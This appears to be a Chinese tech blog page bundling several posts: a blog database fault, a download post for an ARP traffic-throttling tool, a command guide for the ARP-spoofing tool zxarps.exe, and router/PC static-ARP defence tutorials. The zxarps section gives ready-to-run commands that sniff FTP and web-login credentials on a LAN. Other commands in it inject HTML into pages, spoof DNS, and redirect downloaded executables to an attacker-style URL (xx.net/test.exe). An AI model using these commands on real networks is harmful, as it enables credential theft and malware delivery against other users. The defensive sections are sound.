Blog未知原因出现:无分类和无Tag标签

昨天晚上7点钟左右,Pop的博客出现了一些问题,主要表现在这几个方面:

1、Tag无法使用,提示无法找到相关文章

2、因为Tag引起相关日志的插件无法使用,所有文章都是no tags

3、不能正常显示文章分类,所有文章都是Uncategorized

4、源代码底部无故被插入一些如 VVV 之类的垃圾代码

5、虚拟主机无法备份MySQL数据库

解决的过程如下:

首先我第一时间联系到了虚拟主机服务商,起初我以为是我写了什么东西导致数据库出错,于是先备份了数据库,然后将数据库删除了重新恢 Continue reading "Blog未知原因出现:无分类和无Tag标签"

无ARP的流量监控软件:幻境网盾(Skiller)3.7

幻境网盾(Skiller)的特点就是能实现无ARP的网络流量控制,方便你管理整个局域网的流量。

幻境网盾3.7发布2009-09-07 00:25
3.7虽然存在众多BUG由于个人精力原因,将不再开发,即3.7已是幻境系列的最后版本。

20090920更新

1.关于收费
幻境网盾目前没有收费计划,之所以计划发行注册版本是考虑软件的滥用会对网络造成拥塞甚至瘫痪,随着用户数的不断增加,必然会出现同一个网络中存在多个网盾的现象。之后会在防止滥用和维护网络环境做努力。
2.BUG问题
已知的BUG有:
进程不能正常退出
部分系统蓝屏

3.流量探测
3.7为减缓蓝屏在流量探测稍作改动,影响到了部分环境下的流量探测能力。如果不蓝屏的用户可以使用旧版本的skiller。

4.代理问题
不用担心,程序会自动使用代理。

5.无线网卡
幻境网盾的技术原理决定了无法适用与无线环境,所以应该不会有支持无线的版本出现。

公告:

因原cncert团队并入80sec,新版的幻境网盾版权由80SEC所有。
80SEC是业内著名的信息安全团队官方网站www.80sec.com

软件说明:
可突破任意ARP防火墙,以限制流量为目标的简单网络管理软件。

选中主机后开始按钮变为可用

 V3.70 更新说明

1.修正快捷键BUG
2.增加任务动态图标
3.解决部分杀毒软件误报问题

下载地址:
http://www.cncert.net/up_files/soft/skiller3.70.rar
http://www.brsbox.com/filebox/down/fc/18eccf1230900637369163697a01b0c8

 问题解疑
不能探测到流量问题
1.本软件不保证对任何的网络环境和交换机有效
2.网络流量非常小时很可能探测不到主机

3.7的不能设置代理
新版本将由程序自动设置代理无需人工操作

不能使用
对于运行在已经安装.net 2.0 和winpcap4.0 的windows系统,且已经解压出来运行后仍然无法对以太网络进行控制的用户表示遗憾,请使用其他软件。

其他
本软件作为免费软件发行,尽量为更多的用户服务,在提出问题时请尽可能的说明情况。以便解决问题。
直接说诸如“不能使用”,"软件缺陷"而未说明任何系统情况的用户,say sorry...no help..

注意:

需要安装.net 2.0 + winpcap (http://www.winpcap.org)

zxarps.exe 使用方法及winPcap下载

说明:
需要winPcap
基于arp欺骗,
具体功能看下面的使用说明~~~懒得打太多字了~~~

一些注意:
通常欺骗都是针对 网关和同网段下的其他机,所以-sethost [ip] 参数可以不填,
但如果同网段下有某server,而你想嗅探其他用户到该server的数据就要-sethost serverIP

Codz:
0. Realtek RTL8139

IP Address. . . . . : 192.168.1.101

Physical Address. . : 00-11-D8-6B-5E-19

Default Gateway . . : 192.168.1.1

1. WAN (PPP/SLIP) Interface

IP Address. . . . . : xx.xx.xx.xx

Physical Address. . : 00-52-00-00-00-00

Default Gateway . . : xx.xx.xx.xx

options:

-idx [index] 网卡索引号

-ip [ip] 欺骗的IP,用\'-\'指定范围,\',\'隔开

-sethost [ip] 默认是网关,可以指定别的IP

-port [port] 关注的端口,用\'-\'指定范围,\',\'隔开,没指定默认关注所有端口

-reset 恢复目标机的ARP表

-hostname 探测主机时获取主机名信息

-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,

\',\'隔开关键字,多个条件\'|\'隔开

所有带+前缀的关键字都出现的包则写入文件

带-前缀的关键字出现的包不写入文件

带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)

-save_a [filename] 将捕捉到的数据写入文件 ACSII模式

-save_h [filename] HEX模式

-hacksite [ip] 指定要插入代码的站点域名或IP,

多个可用\',\'隔开,没指定则影响所有站点

-insert [html code]指定要插入html代码

-postfix [string] 关注的后缀名,只关注HTTP/1.1 302

-hackURL [URL] 发现关注的后缀名后修改URL到新的URL

-filename [name] 新URL上有效的资源文件名

-hackdns [string] DNS欺骗,只修改UDP的报文,多个可用\',\'隔开

格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1

-Interval [ms] 定时欺骗的时间间隔,单位:毫秒:默认是3000 ms

-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者(默认)

-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB

example:

嗅探指定的IP段中端口80的数据,并以HEX模式写入文件

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log

FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件

zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log

HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log

用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log

如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe

指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun

局域网的MAC(arp)攻击解决方法

制作批处理文件:

在客户端做对网关的arp绑定,具体操作步骤如下:

步骤一:
查找本网段的网关地址,比如192.168.1.1,以下以此网关为例。在正常上网时,“开始→运行→cmd→确定”,输入:arp -a,点回车,查看网关对应的Physical Address。

比如:网关192.168.1.1 对应00-14-78-b7-9e-f8

步骤二:
编写一个批处理文件rarp.bat,内容如下:

@echo off
arp -d
arp -s  192.168.1.1 00-14-78-b7-9e-f8

保存为:rarp.bat。

步骤三:
运行批处理文件将这个批处理文件拖到“Windows→开始→程序→启动”中,如果需要立即生效,请运行此文件。

注意:以上配置需要在网络正常时进行

欺骗形式有欺骗路由器ARP表和欺骗电脑ARP两种,我们的防护当然也是两个方面的,首先在路由器上进行设置,来防止路由器的ARP表被恶意的ARP数据包更改;其次,我们也会在电脑上进行一下设置,来防止电脑的ARP表受恶意更改。两个方面的设置都是必须的,不然,如果您只设置了路由器的防止ARP欺骗功能而没有设置电脑,电脑被欺骗后就不会把数据包发送到路由器上,而是发送到一个错误的地方,当然无法上网和访问路由器了。

一、设置前准备

当使用了防止ARP欺骗功能(IP和MAC绑定功能)后,最好是不要使用动态IP,因为电脑可能获取到和IP与MAC绑定条目不同的IP,这时候可能会无法上网,通过下面的步骤来避免这一情况发生吧。

1.把路由器的DHCP功能关闭:打开路由器管理界面,“DHCP服务器”->“DHCP服务”,把状态由默认的“启用”更改为“不启用”,保存并重启路由器。

2.给电脑手工指定IP地址、网关、DNS服务器地址,如果您不是很清楚当地的DNS地址,可以咨询您的网络服务商。

二、设置路由器防止ARP欺骗

具备这种一功能的路由器产品很多,下面我们以某一款路由器为例,设置路由器防止ARP欺骗。

打开路由器的管理界面可以看到如下的左侧窗口:
可以看到比之前的版本多出了“IP与MAC绑定”的功能,这个功能除了可以实现IP和MAC绑定外,还可以实现防止ARP欺骗功能。

打开“静态ARP绑定设置”窗口如下:
注意,默认情况下ARP绑定功能是关闭,请选中启用后,点击保存来启用。

打开“ARP映射表”窗口如下:

这是路由器动态学习到的ARP表,可以看到状态这一栏显示为“未绑定”。 如果确认这一个动态学习的表没有错误,也就是说当时不存在arp欺骗的情况下(如果网络是正常运行的,而且不同的IP对应的MAC地址不一样,一般是没有错误的) ,我们把这一个表进行绑定,并且保存为静态表,这样路由器重启后这些条目都会存在,达到一劳永逸的效果。

点击“全部绑定”,可以看到下面界面:
可以看到状态中已经为已绑定,这时候,路由器已经具备了防止ARP欺骗的功能,上面的示范中只有三个条目,如果您的电脑多,操作过程也是类似的。有些条目如果没有添加,也可以下次补充上去。除了这种利用动态学习到的ARP表来导入外,也可以使用手工添加的方式,只要知道电脑的MAC地址,手工添加相应条目就可。

为了让下一次路由器重新启动后这些条目仍然存在,我们点击了“全部导入”,然后再次打开“静态ARP绑定设置”窗口:
可以看到静态条目已经添加,而且在绑定这一栏已经打上勾,表示启用相应条目的绑定。到此,我们已经成功设置路由器来防止192.168.1.111、192.168.1.112、222.77.77.1这三个IP受ARP欺骗的攻击,如果有更多的电脑,只是条目数不同,设置过程当然是一样的,不是很难吧?

三、设置电脑防止ARP欺骗

路由器已经设置了防止ARP欺骗功能,接下来我们就来设置电脑的防止ARP欺骗了。微软的操作系统中都带有ARP这一命令行程序,我们可以在windows的命令行界面来使用它。打开windows的命令行提示符如下:
通过“arp-s +路由器IP如192.168.1.1+路由器的MAC地址”这一条命令来实现对路由器的ARP条目的静态绑定,可以看到在arp -a 命令的输出中,已经有了我们刚才添加的条目,Type类型为static表示是静态添加的。至此,我们也已经设置了电脑的静态ARP条目,这样电脑发送到路由器的数据包就不会发送到错误的地方去了。

怎么知道路由器的MAC地址是多少呢?可以打开路由器的管理界面,进入“网络参数”->“LAN口设置”:
LAN口的MAC地址就是电脑的网关的MAC地址。

细心的人可能已经发现了,如果使用上面的方法,电脑每次在重启后都需要输入上面的命令来实现防止ARP欺骗,有没有更简单的方法自动来完成,不用手工输入呢?有!

我们可以新建一个批处理文件如static_arp.bat,注意后缀名为bat。编辑它,在里面加入我们刚才的命令:

保存就可以了,以后可以通过双击它来执行这条命令,还可以把它放置到系统的启动目录下来实现启动时自己执行。打开电脑“开始”->“程序”,双击“启动”打开启动的文件夹目录,把刚才建立的static_arp.bat复制到里面去:

好了,以后电脑每次启动时就会自己执行arp –s命令了,网吧网管和老板终于可以好好休息一下,不再受到ARP攻击的干扰。